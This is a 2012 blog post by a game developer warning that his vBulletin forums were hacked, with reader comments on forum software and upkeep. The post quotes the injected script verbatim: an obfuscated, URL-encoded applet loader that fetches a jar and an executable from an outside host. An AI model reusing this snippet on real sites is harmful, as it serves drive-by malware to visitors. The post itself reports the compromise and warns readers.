Monday, May 7, 2012

www.adom.de/forums hacked once more :-(

Very bad start for the new idea: It seems that www.adom.de/forums (at least) got hacked once more. When I entered the site this morning an applet asked for permission to do "something" on my local computer. There seems to have been code injected into the forum software (once again), here's the piece of code responsible for the problem on the page itself:

<script language=JavaScript>m='%3Capplet%20name%3D%27Please%20Run%20To%20Continue%20%271%27%20height%3D%271%27%20code%3D%27taipans.class%27%20archive%3D%27http%3A//son1c.de/pferd/news/fud.jar%27%3E%3Cparam%20name%3D%22funtime%22%20%0A%0Avalue%3D%22http%3A//son1c.de/pferd/news/p.exe%22%3E%3C/applet%3E';d=unescape(m);document.write(d);</script> 


Naturally you never should allow that access. Please be careful and refrain from using the forums for now until we know better what has happened. Needless to say that this once more is a major setback for me as it took days and days last time to sort that stuff out and I fear for the worst :-(


Needless to say that many thoughts of exterminating those f**** hackers currently are crossing my mind.

7 comments:

  1. I do not dare to venture to the forums now, but may I ask what software you're using? phpBB, SMF, something else?

    ReplyDelete
  2. I believe he's using vbulletin

    ReplyDelete
  3. Yes, vBulletin. Not quite the latest patch level - which already might be the source of trouble. If it is I probably will have to look into some sort of hosted solution since I just fail to have the time to continue with each and every patch. Which additionally is a problem as vBulletin no longer officially supports the project tools used for issue management and losing all that stuff would be a major setback. *Sigh*

    ReplyDelete
  4. Ah, ok, so vBulletin is hooked up to some kind of issue tracker with single sign on etc? And forum users can post and read issues using their forum account?

    ReplyDelete
  5. Yeah. Sadly the issue tracker has been open sourced in 2010 (IIRC) and support is... shaky at best. But I yet need to have a good idea on how to proceed with the forum / issue tracker topic. And I'd hate to lose all the existing issues which is the far worse problem.

    ReplyDelete
  6. Limit the upload MIME types? Usually these exploits in website scripts are just taken advantage of my script kiddies. I doubt the hacker(s) found this for themselves simply to try to take advantage of JUST your site.

    ReplyDelete
  7. I think what you could do is ask the community for a volunteer that would have access to update and maintain the forums for you. I'm not very fond of -or knowledgeable about- web administration, but I'm sure other people are, and that way you would have more time for the important thing - developing ADOM/ADOM II.

    ReplyDelete